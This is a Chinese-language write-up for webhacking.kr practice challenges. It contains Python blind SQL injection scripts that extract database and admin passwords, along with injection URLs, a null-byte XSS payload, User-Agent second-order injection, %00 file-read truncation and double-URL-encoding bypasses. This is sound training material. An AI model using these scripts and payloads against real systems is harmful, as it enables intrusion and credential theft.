Webhacking writeup By Assassin [随便玩一玩]

果真是webhacking,申请账号都这么有逼格^_^用burp抓包发现源码访问如下

这里写图片描述

还有什么decode me需要三次解码base64即可得到一个ip值即可,然后就可以开始我们的挑战啦!

第一关

上来得到代码

<?
if(!$_COOKIE[user_lv])
{
SetCookie("user_lv","1");
echo("<meta http-equiv=refresh content=0>");
}
?>
<html>
<head>
<title>Challenge 1</title>
</head>
<body bgcolor=black>
<center>
<br><br><br><br><br>
<font color=white>
---------------------<br>
<?

$password="????";

if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>5) @solve();

echo("<br>level : $_COOKIE[user_lv]");

?>
<br>
<pre>
<a onclick=location.href='index.phps'>----- index.phps -----</a>
</body>
</html>

然后我们看一下eregi匹配的东西[^0-9,.]匹配了除了数字、小数点和逗号的字符,如果匹配到了那么就将cookie值赋成1,否则沿用,而且我们注意到了存在小数点,要我们输入的东西大于5小于6,就是中间的小数。随便构造一下就好了

这里写图片描述

第二关

这一关不全是我自己想出来的…主要是确实想不到吧。首先扫描了一遍目录,发现存在/admin/后台,然后尝试了一下并不存在什么注入点(一开始一心以为是注入,以为只不过我的水平实在是太差了而已)但是经过提示是cookie注入…加上无意间发现了这个玩意

这里写图片描述

发现个别时候时间会出现error???而且我们的时间戳不变的话反映出的时间其实不会改变的。然后尝试盲注发现可以成功爆出所在数据库

#_*_ coding:utf-8 _*_
import re,urllib,requests
url = 'http://webhacking.kr/challenge/web/web-02/'
temp = 0
def search2(content,pos,l,r):
    global temp
    if l>r:
        return 
    mid = (l+r)/2
    inject='23333333 and 1=(select ascii(substr('+content+' from '+str(pos)+'))>='+str(mid)+')'
    print inject
    cookies = {'time':inject,'PHPSESSID':'136de2147ed2139e37dceda9c0d90144','td_cookie':'18446744072591562357'}
    html = requests.get(url,cookies=cookies).text.encode('utf-8')
    if '<!--2070-01-01 09:00:01-->' in html:
        temp=mid
        search2(content,pos,mid+1,r)
    else :
        search2(content,pos,l,mid-1)
def get_database():
    global url 
    global temp
    db =''
    for i in range(1,50):
        temp = 0
        search2('database()',i,1,130)
        if temp==0:
            break
        db+=chr(temp)
        print db
get_database()

但是仅仅限于此了,因为它过滤了table_name等关键词…然后就陷入了尴尬的情况,我们到底需要知道什么?猜测就是password列名和admin表名…成功了??

#_*_ coding:utf-8 _*_
import re,urllib,requests
url = 'http://webhacking.kr/challenge/web/web-02/'
temp = 0
def search2(content,pos,l,r):
    global temp
    if l>r:
        return 
    mid = (l+r)/2
    inject='23333333 and 1=(select ascii(substr('+content+' from '+str(pos)+'))>='+str(mid)+')'
    print inject
    cookies = {'time':inject,'PHPSESSID':'136de2147ed2139e37dceda9c0d90144','td_cookie':'18446744072591562357'}
    html = requests.get(url,cookies=cookies).text.encode('utf-8')
    if '<!--2070-01-01 09:00:01-->' in html:
        temp=mid
        search2(content,pos,mid+1,r)
    else :
        search2(content,pos,l,mid-1)
def get_password():
    global url 
    global temp
    password =''
    for i in range(1,50):
        temp = 0
        search2('(select password from admin)',i,1,130)
        if temp==0:
            break
        password+=chr(temp)
        print password
#get_database()
#webhacking   0x7765626861636b696e67
get_password()

到/admin/登陆试试然后看到

-관리자 패스워드가 유출되지 않게 조심하세요.
-처음 사용하시는 분은 메뉴얼을 참고하세요.(메뉴얼 패스워드 : @dM1n__nnanual)

但是我们的目标似乎在这里

这里写图片描述

嗯…但是这个提示有个鬼用…试了试都不是该密码,莫名其妙的又一个脑洞…

这里写图片描述

对,你没猜错,这个地方存在一个password列…我…直接爆就行了,加上这个代码

def get_password():
    global url 
    global temp
    password =''
    for i in range(1,50):
        temp = 0
        search2('(select password from FreeB0aRd)',i,1,140)
        if temp==0:
            break
        password+=chr(temp)
        print password

容易得到密码是7598522ae,进入以后发现存在一个压缩包的连接什么鬼???
zip文件还存在密码…额,这个估计就是admin里面提示的那个密码了吧,打开尝试果真如此,成功打开网页发现了答案…

HacKed_by_n0b0dY 

脑洞真心艰难…劳资要报警了…喂?110在吗?

第三关

真是够了有没有…这玩意就是真的猜测题目啊!!!!还想爆破,不过感觉就是扯淡…然后观察格子,最后猜测,就是每一行或每一列对应的就是我们应该画上的黑格子的数量,比如一个3,我们就要画三个连续的黑格子,比如111,我们就要画三个间隔的黑格子

这里写图片描述

敢不敢别真出数学题啊…
然后我们可以进入到这个界面
这里写图片描述

看着正常多了…猜测是注入吧,因为回显并没有显示什么,神特么什么都搞不出来…后面提交的answer貌似存在注入吧,会回显query error!fuzz 一发(也不知道他要干嘛)得到没过滤的寥寥无几

发现or and select什么的都被过滤了,不像是注入了…扎心了老铁…实在不知道干嘛看了题解,我知道||没过滤,但是这又是啥做法……

这里写图片描述

我真的要报警了啊,实在是脑洞太大了……要么简单到死要么脑洞难…

第四关

这是什么玩意儿???首先base64解密,得到一个什么sha1的东东?
拿去解密解密成功得到

a94a8fe5ccb19ba61c4c0873d391e987982fbbd3

神特么…还是sha1?继续解密得到答案…

test

第五关

发现了界面上显示有什么login和join按钮,然后看一下源码发现存在/mem/login.php,而join按钮直接返回一个alert,但是真的是想错了!!!真是太社会了…发现/mem/目录可见!!!就会发现在那个目录地下还有一个join.php。。。惊不惊喜?
得到一堆源码,然后稍微处理一下,主要代码如下

<script>
            l = 'a';
            ll = 'b';
            lll = 'c';
            llll = 'd';
            lllll = 'e';
            llllll = 'f';
            lllllll = 'g';
            llllllll = 'h';
            lllllllll = 'i';
            llllllllll = 'j';
            lllllllllll = 'k';
            llllllllllll = 'l';
            lllllllllllll = 'm';
            llllllllllllll = 'n';
            lllllllllllllll = 'o';
            llllllllllllllll = 'p';
            lllllllllllllllll = 'q';
            llllllllllllllllll = 'r';
            lllllllllllllllllll = 's';
            llllllllllllllllllll = 't';
            lllllllllllllllllllll = 'u';
            llllllllllllllllllllll = 'v';
            lllllllllllllllllllllll = 'w';
            llllllllllllllllllllllll = 'x';
            lllllllllllllllllllllllll = 'y';
            llllllllllllllllllllllllll = 'z';
            I = '1';
            II = '2';
            III = '3';
            IIII = '4';
            IIIII = '5';
            IIIIII = '6';
            IIIIIII = '7';
            IIIIIIII = '8';
            IIIIIIIII = '9';
            IIIIIIIIII = '0';
            li = '.';
            ii = '<';
            iii = '>';
            lIllIllIllIllIllIllIllIllIllIl = lllllllllllllll + llllllllllll + llll + llllllllllllllllllllllllll + lllllllllllllll + lllllllllllll + ll + lllllllll + lllll;
            lIIIIIIIIIIIIIIIIIIl = llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + lll + lllllllllllllll + lllllllllllllll + lllllllllll + lllllllll + lllll;
            if (eval(lIIIIIIIIIIIIIIIIIIl).indexOf(lIllIllIllIllIllIllIllIllIllIl) == -1) {
                alert("Goodbye");
            }
            if (eval(llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + 'U' + 'R' + 'L').indexOf(lllllllllllll + lllllllllllllll + llll + lllll + '=' + I) == -1) {
                alert('access_denied');
                history.go(-1);
            } else {
                document.write('<font size=2 color=white>Join</font><p>');
                document.write('.<p>.<p>.<p>.<p>.<p>');
                document.write('<form method=post action=' + llllllllll + lllllllllllllll + lllllllll + llllllllllllll + li + llllllllllllllll + llllllll + llllllllllllllll + '>');
                document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name=' + lllllllll + llll + ' maxlength=5></td></tr>');
                document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name=' + llllllllllllllll + lllllllllllllllllllllll + ' maxlength=10></td></tr>');
                document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>');
            }
        </script>

可以看到是一个代码混淆,然后怎么处理,我尝试去乖乖地想办法绕过,但是貌似并不行…然后呢?发现它其实是js控制的申请输入啊!我们为什么不能自己重新构造利用呢!!!然后我们利用console输入如下代码

            l = 'a';
            ll = 'b';
            lll = 'c';
            llll = 'd';
            lllll = 'e';
            llllll = 'f';
            lllllll = 'g';
            llllllll = 'h';
            lllllllll = 'i';
            llllllllll = 'j';
            lllllllllll = 'k';
            llllllllllll = 'l';
            lllllllllllll = 'm';
            llllllllllllll = 'n';
            lllllllllllllll = 'o';
            llllllllllllllll = 'p';
            lllllllllllllllll = 'q';
            llllllllllllllllll = 'r';
            lllllllllllllllllll = 's';
            llllllllllllllllllll = 't';
            lllllllllllllllllllll = 'u';
            llllllllllllllllllllll = 'v';
            lllllllllllllllllllllll = 'w';
            llllllllllllllllllllllll = 'x';
            lllllllllllllllllllllllll = 'y';
            llllllllllllllllllllllllll = 'z';
            I = '1';
            II = '2';
            III = '3';
            IIII = '4';
            IIIII = '5';
            IIIIII = '6';
            IIIIIII = '7';
            IIIIIIII = '8';
            IIIIIIIII = '9';
            IIIIIIIIII = '0';
            li = '.';
            ii = '<';
            iii = '>';
            lIllIllIllIllIllIllIllIllIllIl = lllllllllllllll + llllllllllll + llll + llllllllllllllllllllllllll + lllllllllllllll + lllllllllllll + ll + lllllllll + lllll;
            lIIIIIIIIIIIIIIIIIIl = llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + lll + lllllllllllllll + lllllllllllllll + lllllllllll + lllllllll + lllll;
                document.write('<font size=2 color=white>Join</font><p>');
                document.write('.<p>.<p>.<p>.<p>.<p>');
                document.write('<form method=post action=' + llllllllll + lllllllllllllll + lllllllll + llllllllllllll + li + llllllllllllllll + llllllll + llllllllllllllll + '>');
                document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name=' + lllllllll + llll + ' maxlength=50></td></tr>');
                document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name=' + llllllllllllllll + lllllllllllllllllllllll + ' maxlength=100></td></tr>');
                document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>');

然后可以发现出现了输入框(注意,我们重新改了输入的长度限制!!!)然后尝试利用数据库长度截断来着,但是报错了,那我们尝试在后面构造空格绕过即可

username:admin (注意结尾还有个空格!)
password:123

又涨见识了…长见识…

第六关

简单到没边…真是够了…

#_*_coding:utf-8_*_
import re,urllib,requests,base64
def change1(sss):
    return sss.replace("!","1").replace("@","2").replace("$","3").replace("^","4").replace("&","5").replace("*","6").replace("(","7").replace(")","8")
def change2(sss):
    return sss.replace("1","!").replace("2","@").replace("3","$").replace("4","^").replace("5","&").replace("6","*").replace("7","(").replace("8",")") 
'''
sss='Vm0wd@QyUXlVWGxWV0d^V!YwZDRWMVl$WkRSV0!WbDNXa!JTVjAxV@JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll&U@tWVWJHaG9UVlZ$VlZadGNFSmxSbGw!VTJ0V!ZXSkhhRzlVVmxaM!ZsWmFjVkZ0UmxSTmJFcEpWbTEwYTFkSFNrZGpSVGxhVmpOU!IxcFZXbUZrUjA!R!UyMTRVMkpIZHpGV!ZFb$dWakZhV0ZOcmFHaFNlbXhXVm!wT!QwMHhjRlpYYlVaclVqQTFSMXBGV@xOVWJGcFlaSHBHVjFaRmIzZFdha!poVjBaT@NtRkhhRk&sYlhoWFZtMHhORmxWTUhoWGJrNVlZbFZhY@xWcVFURlNNVlY!VFZSU!ZrMXJjRWxhU0hCSFZqRmFSbUl*WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob!dGWnRNWGRVTVZGM!RVaG9hbEpzY0ZsWmJGWmhZMnhXY!ZGVVJsTk&WbFkxVkZaU!UxWnJNWEpqUld^aFUwaENTRlpxUm!GU@JVbDZXa!prYUdFeGNHOVdha0poVkRKT@RGSnJhR@hTYXpWeldXeG9iMWRHV@&STldHUlZUVlpHTTFSVmFHOWhiRXB*WTBac!dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXYjJFeFdYZE&WVlpUWVRGd!YxbHJXa$RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS!QyUkdTbkpoUjJoVFlYcFdlbGRYZUc&aU!XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU!ZtRkhPVmhTTUhCNVZHeGFjMWR0U@tkWGJXaGFUVzVvV0ZreFdrZFdWa$B*VkdzMVYwMVZiekZXYlhCS!RWZEZlRmRZWkU!V!ZscFVXV$RrVTFsV!VsWlhiVVpPVFZad@VGVXlkREJXTVZweVkwWndXR0V^Y0ROV@FrWkxWakpPU!dKR!pGZFNWWEJ@Vm!0U!MxUXlUWGxVYTFwb!VqTkNWRmxZY0ZkWFZscFlZMFU!YVUxcmJEUldNalZUVkd^a!NGVnNXbFZXYkhCWVZHdGFWbVZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV!IwVTJ0a!dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV@EzQjZWa@R*TVZkR!NsWmpSV$hYWWxoQ!RGUnJXbEpsUm!SellVWlNhRTFzU@&oV!Z*QjRUa@RHUjFaWVpHaFNWVFZWVlcxNGQyVkdWblJOVldSV!RXdHdWMWxyVW!GWFIwVjRZMGhLV@xaWFVrZGFWV!JQVTBVNVYxcEhhR@hOU0VKMlZtMTBVMU!^VVhsVmEyUlZZbXR$YUZWdGVFdGpSbHB^VkcwNVYxWnNjRWhYVkU!dllWVXhXRlZ!Y0ZkTlYyaDJWMVphUzFJeFRuVlJiRlpYVFRGS0&sWkdVa@RWTVZwMFVtdG9VRlp0YUZSVVZXaERVMnhhYzFwRVVtcE&WMUl$VlRKMGExZEhTbGhoUjBaVlZucFdkbFl$V@&KbFJtUnlXa!prVjJFelFqWldhMlI@VFZaWmVWTnJaR@hOTW!oWVdWUkdkMkZHV@xWU@JGcHNVbTFTTVZVeWN*RlhSa$BaVVc!b!YxWXphSEpVYTJSSFVqRmFXVnBIYUZOV!ZGWldWbGN^TkdReVZrZFdXR$hyVWpCYWNGVnRlSGRsYkZsNVpVaGtXRkl$VmpSWk!GSlBWMjFGZVZWclpHRldNMmhJV!RJeFMxSXhjRWhpUm!oVFZsaENTMVp0TVRCVk!VMTRWbGhvV0ZkSGFGbFpiWGhoVm!^c@NscEhPV$BTYkhCNFZrY$dOVll^V@&OalJXaFlWa!UxZGxsV!ZYaFhSbFp&WVVaa!RtRnNXbFZXYTJRMFdWWktjMVJ!VG!oU@JGcFlXV$hhUm!ReFduRlJiVVphVm0xU!NWWlhkRzloTVVwMFlVWlNWVlpXY0dGVVZscGhZekZ$UlZWdGNFNVdNVWwzVmxSS0!HRXhaRWhUYkdob!VqQmFWbFp0ZUhkTk!WcHlWMjFHYWxacmNEQmFSV!F$VmpKS@NsTnJhRmRTTTJob!ZrUktSMVl^VG&WVmJFSlhVbFJXV!ZaR!l*RmlNV!JIWWtaV!VsZEhhRlJVVm!SVFpXeHNWbGRzVG!oU!ZFWjZWVEkxYjFZeFdYcFZiR@hZVm!^d!lWcFZXbXRrVmtwelZtMXNWMUl*YURWV0!XUXdXVmRSZVZaclpGZGliRXB&Vld0V!MySXhiRmxqUldSc!ZteEtlbFp0TURWWFIwcEhZMFpvV@sxSGFFeFdNbmhoVjBaV@NscEhSbGROTW!oSlYxUkplRk!^U!hoalJXUmhVbXMxV0ZZd!ZrdE&iRnAwWTBWa!dsWXdWalJXYkdodlYwWmtTR0ZHV@xwaVdHaG9WbTE0YzJOc!pISmtSM0JUWWtad0&GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV@FrNVRWRVpzVlZGWWFGTldhM0I@VmtkNFlWVXlTa!pYV0hCWFZsWndSMVF^V@tOVmJFSlZUVVF$UFE9PQ=='
sss=change1(sss)
for i in range(20):
    sss=base64.b64decode(sss)
print sss
'''
sss='admin'
for i in range(20):
    sss=base64.b64encode(sss)
print urllib.quote(change2(sss))

然后用得到的值去替换cookie即可

第七关

扫一遍目录发现index.phps,看源码

<?
$answer = "????";

$go=$_GET[val];

if(!$go) { echo("<meta http-equiv=refresh content=0;url=index.php?val=1>"); }

$ck=$go;

$ck=str_replace("*","",$ck);
$ck=str_replace("/","",$ck);


echo("<html><head><title>admin page</title></head><body bgcolor='black'><font size=2 color=gray><b><h3>Admin page</h3></b><p>");


if(eregi("--|2|50|\+|substring|from|infor|mation|lv|%20|=|!|<>|sysM|and|or|table|column",$ck)) exit("Access Denied!");

if(eregi(' ',$ck)) { echo('cannot use space'); exit(); }

$rand=rand(1,5);

if($rand==1)
{
$result=@mysql_query("select lv from lv1 where lv=($go)") or die("nice try!");
}

if($rand==2)
{
$result=@mysql_query("select lv from lv1 where lv=(($go))") or die("nice try!");
}

if($rand==3)
{
$result=@mysql_query("select lv from lv1 where lv=((($go)))") or die("nice try!");
}

if($rand==4)
{
$result=@mysql_query("select lv from lv1 where lv=(((($go))))") or die("nice try!");
}

if($rand==5)
{
$result=@mysql_query("select lv from lv1 where lv=((((($go)))))") or die("nice try!");
}

$data=mysql_fetch_array($result);
if(!$data[0]) { echo("query error"); exit(); }
if($data[0]!=1 && $data[0]!=2) { exit(); }


if($data[0]==1)
{
echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=
alert('Access_Denied!')><p>");
echo("<!-- admin mode : val=2 -->");
}

if($data[0]==2)
{
echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=
alert('Congratulation')><p>");
@solve();
} 
?>

然后发现提示说没有结果的2的列,要用union select查询,恰巧就没有过滤这些,但是貌似过滤了2和+、*、/,但是还存在减号可以构造(5-3),空格过滤可以用圆括号代替,但是不知道为啥本地都通过了网站确显示406….

这里写图片描述

额…我百分百确定是网站炸了…我以为是自己姿势不对,然后看了看大佬的payload和我思路一样,不背锅~

http://webhacking.kr/challenge/web/web-07/index.php?val=0)union%09select(3-1

尝试后貌似是不能又select,一有就完蛋。

第八关

打开源码发现存在提示index.phps存在内容

<?
$agent=getenv("HTTP_USER_AGENT");
$ip=$_SERVER[REMOTE_ADDR];
$agent=trim($agent);
$agent=str_replace(".","_",$agent);
$agent=str_replace("/","_",$agent);
$pat="/\/|\*|union|char|ascii|select|out|infor|schema|columns|sub|-|\+|\||!|update|del|drop|from|where|order|by|asc|desc|lv|board|\([0-9]|sys|pass|\.|like|and|\'\'|sub/";
$agent=strtolower($agent);
if(preg_match($pat,$agent)) exit("Access Denied!");
$_SERVER[HTTP_USER_AGENT]=str_replace("'","",$_SERVER[HTTP_USER_AGENT]);
$_SERVER[HTTP_USER_AGENT]=str_replace("\"","",$_SERVER[HTTP_USER_AGENT]);
$count_ck=@mysql_fetch_array(mysql_query("select count(id) from lv0"));
if($count_ck[0]>=70) { @mysql_query("delete from lv0"); }
$q=@mysql_query("select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'");
$ck=@mysql_fetch_array($q);
if($ck)
{ 
    echo("hi <b>$ck[0]</b><p>");
    if($ck[0]=="admin")
    {
        @solve();
        @mysql_query("delete from lv0");
    }
}

if(!$ck)
{
    $q=@mysql_query("insert into lv0(agent,ip,id) values('$agent','$ip','guest')") or die("query error");
    echo("<br><br>done!  ($count_ck[0]/70)");
}
?>

发现是ua构造注入,但是总感觉UA反而被防护的很死,但是下面一看还存在注入的东西,哎?那么我们能否尝试构造二次注入呢?因为$_SERVER['REMOTE_ADDR']这东西不好注入,再好好看了看,发现UA并不是防的水泄不通!而且二次注入的思路是正确的!我们只需要insert进入值后每次查找就会找到对应的值!
而且最最重要的是,没有过滤单引号、逗号和井号!这就搞笑了
首先构造

User-Agent: ','1','admin')#

这个时候会插入一条信息,UA和ip为空,id为我们注入的admin,只需要再进行一次查询,输入

User-Agent:(没错,后面什么都没有)

就可以完成挑战了,不难。

第十关

我们回来看第十关,之前扫目录乌龙发现做出了12题,知道估计就是本页面解决问题,看来看去发现源码中有东西

这里写图片描述

然后分析我们知道,当我们点击一下的时候某个变量自加1,然后当变量达到800的时候跳转到一个链接。那我们直接在页面上修改该变量是800就行了!嗯,该问题就解决了嗯.
当然你也可以直接加上自己猜测的后缀,加上?go=800

第十一关

就是个正则表达式???

这里写图片描述

随便搞一下就结束了嗯

http://webhacking.kr/challenge/codeing/code2.html?val=3aaaaa_.117.61.4.9.%09p%09a%09s%09s

第十二关

这个不是我有心做的,在看10题的时候扫了一下目录发现存在

这里写图片描述

http://webhacking.kr/challenge/codeing/test.php

嘿嘿嘿,打开看了一下

这里写图片描述

然后不知道的直接带到console跑一下就好了
这里写图片描述

这里写图片描述

结果做出来之后才发现…这是12题…额…继续去做第十题…

第十四关

因为这个简单嘛!发现源码

<script>
function ck()
{
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { alert("Password is "+ul*pw.input_pwd.value); }
else { alert("Wrong"); }
}

</script>

直接在console试试就好了

这里写图片描述

输入510即可得到password

260100

第十五关

呵呵哒,直接抓包即可

<script>
alert("Access_Denied");
history.go(-1);
document.write("password is off_script");
</script>

第十六关

打开了看过之后不知道是什么东西…看了半天也没看出个所以然,但是继续看发现存在一个跳转?

function mv(cd)
{
kk(star.style.posLeft-50,star.style.posTop-50);
if(cd==100) star.style.posLeft=star.style.posLeft+50;
if(cd==97) star.style.posLeft=star.style.posLeft-50;
if(cd==119) star.style.posTop=star.style.posTop-50;
if(cd==115) star.style.posTop=star.style.posTop+50;
if(cd==124) location.href=String.fromCharCode(cd);
}

所以我们只需要构造

mv(124)
Password is webhacking.kr

第十七关

简单的js题目,直接console运行一下js就行了,得到该值

9997809307
Password is 999780930.7

第十八关

碰到了稍微正经的题目

<? 
if($_GET[no]) 
{ 
if(eregi(" |/|\(|\)|\t|\||&|union|select|from|0x",$_GET[no])) exit("no hack"); 
$q=@mysql_fetch_array(mysql_query("select id from challenge18_table where id='guest' and no=$_GET[no]")); 
if($q[0]=="guest") echo ("hi guest"); 
if($q[0]=="admin") 
{ 
@solve(); 
echo ("hi admin!"); 
} 
} 

?> 

发现我们可以控制的是no值,当输入1的时候返回hi guest,说好的100分题目,没get到,发现过滤了tab和空格,不出意外可以通过%0a绕过
,然后自己构建数据库试验了一下,发现这样可以

mysql> select flag from flag where user='guest' and id=1;
+------------------------+
| flag                   |
+------------------------+
| flag{flag_is_not_here} |
+------------------------+
1 row in set (0.00 sec)

mysql> select flag from flag where user='guest' and id=0 or user='admin';
+--------------------+
| flag               |
+--------------------+
| flag{flag_is_here} |
+--------------------+
1 row in set (0.00 sec)

但是我在网站上构造的时候不能成功执行,不知为何,但是我们可以通过构造no=0 or 1 limit 1,1搜索到admin

这里写图片描述

http://webhacking.kr/challenge/web/web-32/index.php?no=0%0aor%0a1%0alimit%0a1,1

还是费了一些功夫的

第十九关

胡乱提交发现

这里写图片描述

以为是什么提示,做了n久最后发现,题目爆炸了…

第二十关

思考…

这里写图片描述

然后查看代码发现一个比较重要的线索吧

function ck()
{

if(lv5frm.id.value=="") { lv5frm.id.focus(); return; }
if(lv5frm.cmt.value=="") { lv5frm.cmt.focus(); return; }
if(lv5frm.hack.value=="") { lv5frm.hack.focus(); return; }
if(lv5frm.hack.value!=lv5frm.attackme.value) { lv5frm.hack.focus(); return; }

lv5frm.submit();

}

然后就在想这到底是个啥,它说是js的代码问题,不是别的…这个….
我们尝试用js直接绕过他的限制?

lv5frm.id.value="1"
lv5frm.cmt.value="1"
lv5frm.hack.value=lv5frm.attackme.value
lv5frm.submit()

什么玩意,居然还要多试很多次,搞得我尴尬癌都快犯了…

第二十一关

说是盲注来着,还是比较简单的,没什么过滤,然后轻松找到注入点就是id

http://webhacking.kr/challenge/bonus/bonus-1/index.php
?no=0 or (select 1)%23
&id=123
&pw=123

发现返回True,如果改成select 0就会返回false,然后就可以写脚本了,但是过滤了from…这搞个鸡儿啊…但是看了看大佬的思路???居然直接select id或者select pw就行了…并不是常规的东西,真的好绝望…但是直接select pw貌似还不行,继续尝试发现提交1和2的时候都是返回True,那么是不是说明不是第一个呢?而且渐渐的明白构造的语句是什么

mysql> select flag from flag where id =2 and user='guest';
+------------------------+
| flag                   |
+------------------------+
| flag{flag_is_not_here} |
+------------------------+
1 row in set (0.00 sec)
mysql> select flag from flag where id =2 and (ascii(substring(user,1,1))=103);
+------------------------+
| flag                   |
+------------------------+
| flag{flag_is_not_here} |
+------------------------+
1 row in set (0.00 sec)
mysql> select flag from flag where id =2 and (ascii(substring(user,1,1))=104);
Empty set (0.00 sec)

就是酱,然后就注入就好了

#_*_coding:utf-8 _*_
import requests
headers={
    'Cookie':'PHPSESSID=cee7319f211ddf15f8aa79037787b6cd' #填写自己账号的cookie
}
temp=0
def search(content,pos,l,r):
    if l>r:
        return 
    global temp
    global headers
    mid=(l+r)/2
    url='http://webhacking.kr/challenge/bonus/bonus-1/index.php?no=2 %26%26 (select ascii(substring('+str(content)+','+str(pos)+',1))>'+str(mid)+')'
    print url
    html = requests.get(url,headers=headers).text
    if 'True' in html:
        temp = max(temp,mid)
        search(content,pos,mid+1,r)
    else:
        search(content,pos,l,mid-1)


def get_table():
    global temp 
    database=''
    for length in range(1,50):
        flag=0
        temp=0
        search("(select pw)",length,32,133)
        if temp!=0:
            database+=chr(temp)
        else :
            break
        print database
get_table()

得到akhmcrpkhmidbshnmjj提交了不对,然后继续看大佬答案,脑洞….

这里写图片描述

我要哭了…

blindsqlinjectionkk

第二十一关

一个XSS题目,尝试了半天,过滤了<script>javascript等等然后尝试了16进制和8进制未果,然后尝试html转码还是未果,有点蒙圈了。而且过滤了其他标签,事实上是过滤了<字母且长度大于等于2>,那么就想到了<a>等这种特殊的标签。

这里写图片描述

但是各种尝试还是未果…都要疯掉了…看了一下大牛们的思路,神马!!!这是什么套路…这里%00没有截断,而是作为NULL输入的然后可以利用这个绕过过滤…我去…
这里写图片描述

http://lureout.tistory.com/515

<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%001%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>

这里写图片描述

长见识了哥

第二十四关

发现源码,然后观看源码发现最最直接的利用他的replace函数构造伪造,因为匹配的都不存在单字符,所以可以使用,只需要构造

<?
extract($_SERVER);
extract($_COOKIE);
if(!$REMOTE_ADDR) $REMOTE_ADDR=$_SERVER[REMOTE_ADDR];
$ip=$REMOTE_ADDR;
$agent=$HTTP_USER_AGENT;
if($_COOKIE[REMOTE_ADDR])
{
$ip=str_replace("12","",$ip);
$ip=str_replace("7.","",$ip);
$ip=str_replace("0.","",$ip);
}
echo("<table border=1><tr><td>client ip</td><td>$ip</td></tr><tr><td>agent</td><td>$agent</td></tr></table>");
if($ip=="127.0.0.1")
{
@solve();
}
else
{
echo("<p><hr><center>Wrong IP!</center><hr>");
}
?>

这里写图片描述

第二十五关

水题,利用了%00构造截断,之前注入file=hello可以看到读取了hello.txt,那么想要读取php文件就截断.txt即可

这里写图片描述

http://webhacking.kr/challenge/bonus/bonus-5/?file=password.php%00

第二十六关

发现源码

<? 

if(eregi("admin",$_GET[id])) { echo("<p>no!"); exit(); } 

$_GET[id]=urldecode($_GET[id]); 

if($_GET[id]=="admin") 
{ 
@solve(26,100); 
} 

?> 

水题

http://webhacking.kr/challenge/web/web-11/?id=%2561%2564%256d%2569%256e

利用了两次urldecode去构造绕过

第二十七关

还是注入题目,首先看到存在源码泄露index.phps

 <html>
<head>
<title>Challenge 27</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get action=index.php>
<input type=text name=no><input type=submit>
</form>
<?
if($_GET[no])
{

if(eregi("#|union|from|challenge|select|\(|\t|/|limit|=|0x",$_GET[no])) exit("no hack");

$q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error");

if($q[id]=="guest") echo("guest");
if($q[id]=="admin") @solve();

}

?>
<!-- index.phps -->
</body>
</html>

然后随便想了一种思路,在本地测试通过但是不知道为什么服务器死活不过,希望各位大佬指正

localhost/test.php?no=0) or id like 'admin' and no like 1--%20

输出为
select id from challenge27_table where id='guest' and no=(0) or id like 'admin' and no like 1-- )

除非是服务器中根本不存在admin这个人,但是事实不是我所意淫的,最终的解决方案是利用排序,或者说搜索到另一个,思路和我很像,最终payload

http://webhacking.kr/challenge/web/web-12/
?no=0) or no like 2 --%20

刚刚我们说的order by排序这里还有另一种结题思路,一看便知

http://webhacking.kr/challenge/web/web-12/
?no=0) or 1 order by id asc --%20

简直233

第三十关

关键代码如下

$port=rand(10000,10100);
$socket=fsockopen("$_GET[server]","$port",$errno,$errstr,3) or die("error : $errstr");

猜到了,这个是随机打开一个10000到10100的端口建立socket,真是醉了,我岂不是要用服务器开个端口监听然后疯狂刷包等待看看返回什么玩意儿!!!果真是…
正常链接的不会报错

这里写图片描述

然后服务器可以看到答案嗯
这里写图片描述

第三十二关

看到一个列表,一脸懵逼,但是审计源码发现存在一些隐藏的链接,形如?hit=然后随便点击一个返回no,猜测就是某一个是正确的。先提取出来所有的链接,然后用burp去爆破一下就好了嗯,但是貌似失败了,不是这个,没什么反应,反而倒是觉得是不是像把自己变成第一就行了呢?但是一提交就是no,应该是卡住了什么条件。
然后发现burp包中存在一个非常关键的cookie,当我们去掉了他的时候就可以绕过那个烦人的no了

这里写图片描述

然后法宝刷分即可,刷爆
这里写图片描述

做这个还是费了不少的力气的,因为确实忘记了cookie验证这个东东了…

第三十三关

首先明显提示得到源码

构造http://webhacking.kr/challenge/bonus/bonus-6/?get=hehe看到下一步得到一个php文件
进入next发现又可以得到新的php文件的源码

这里写图片描述

到了下一步构造

http://webhacking.kr/challenge/bonus/bonus-6/33.php?myip=自己公网的ip

这里自己挂了个代理轻松也就过了,因为现在$_SERVER['REMOTE_ADDR']是不能伪造的
然后进入level4看一下源码

<?
if($_GET[password]==md5(time()))
{
echo("<a href=###>Next</a>");
}
else
{
echo("hint : ".time());
}
?>

